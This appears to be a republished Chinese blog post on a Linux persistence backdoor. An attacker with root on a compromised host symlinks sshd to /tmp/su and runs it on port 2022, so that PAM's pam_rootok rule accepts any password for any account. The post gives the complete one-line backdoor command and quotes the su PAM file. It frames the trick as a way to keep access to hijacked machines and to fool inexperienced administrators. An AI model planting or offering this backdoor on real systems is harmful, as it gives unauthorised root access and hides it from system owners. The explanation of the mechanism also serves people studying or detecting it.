利用系統特性偽裝成一個免密登陸後門
阿新 • • 發佈:2022-04-29
0x00. 引言
這是一個使用到了一點小伎倆的後門,如果滲透進入一個系統並拿到root許可權的shell,對方防火牆沒有限制,則可以通過本文的方法執行一個root可登陸且不需要許可權的ssh後門。 這可以用來欺騙一些沒有安全意識和經驗的系統管理員可以在肉雞上執行以下命令,執行這個ssh後門
ln -sf /usr/sbin/sshd /tmp/su;nohup /tmp/su -oPort=2022 &
然後開啟一個新的登陸會話測試一下:
賬戶root, 密碼隨便填寫
登陸成功
0x01. 為什麼可以免密登陸
上面的後門執行的程序名是su,當用戶登入的時候,會去/etc/pam.d/下尋找su檔案(其實這裡不一定要是su檔案,只要/etc/pam.d 目錄下存在和後門的程序名同名的檔案,則系統在認證的時候就會去讀取這個檔案內容進行認證), 內容參考如下(kali2 系統)
# # The PAM configuration file for the Shadow `su' service # # This allows root to su without passwords (normal operation) auth sufficient pam_rootok.so # Uncomment this to force users to be a member of group root # before they can use `su'. You can also add "group=foo" # to the end of this line if you want to use a group other # than the default "root" (but this may have side effect of # denying "root" user, unless she's a member of "foo" or explicitly # permitted earlier by e.g. "sufficient pam_rootok.so"). # (Replaces the `SU_WHEEL_ONLY' option from login.defs) # auth required pam_wheel.so # Uncomment this if you want wheel members to be able to # su without a password. # auth sufficient pam_wheel.so trust # Uncomment this if you want members of a specific group to not # be allowed to use su at all. # auth required pam_wheel.so deny group=nosu # Uncomment and edit /etc/security/time.conf if you need to set # time restrainst on su usage. # (Replaces the `PORTTIME_CHECKS_ENAB' option from login.defs # as well as /etc/porttime) # account requisite pam_time.so # This module parses environment configuration file(s) # and also allows you to use an extended config # file /etc/security/pam_env.conf. # # parsing /etc/environment needs "readenv=1" session required pam_env.so readenv=1 # locale variables are also kept into /etc/default/locale in etch # reading this file *in addition to /etc/environment* does not hurt session required pam_env.so readenv=1 envfile=/etc/default/locale # Defines the MAIL environment variable # However, userdel also needs MAIL_DIR and MAIL_FILE variables # in /etc/login.defs to make sure that removing a user # also removes the user's mail spool file. # See comments in /etc/login.defs # # "nopen" stands to avoid reporting new mail when su'ing to another user session optional pam_mail.so nopen # Sets up user limits according to /etc/security/limits.conf # (Replaces the use of /etc/limits in old login) session required pam_limits.so # The standard Unix authentication modules, used with # NIS (man nsswitch) as well as normal /etc/passwd and # /etc/shadow entries. @include common-auth @include common-account @include common-session
重點是這行:
auth sufficient pam_rootok.sosufficient 表示只要這行滿足,直接返回登入成功
好,我們再來看一下 Linux man 手冊上關於 pam_rootok.so 的介紹
這個認證模組是認證你的UID是否為0,然後return pam的結果(0就ok,其他就不OK)。
再去看一下pam_rootok.so的原始碼,發現
關鍵點在於紅框部分,模組會呼叫getuid(),如果get的uid為0,它會檢查selinux的root是否為0或是否在啟用selinux下為0,是0,則返回認證成功,否則認證失敗。
那麼getuid()是從哪裡來的,查了一下:
也就是根據後門執行的程序userid來的, 只要後門程序是以userid 為0的使用者執行,那麼什麼使用者都可以免密登陸
換個普通使用者試試
免密登入成功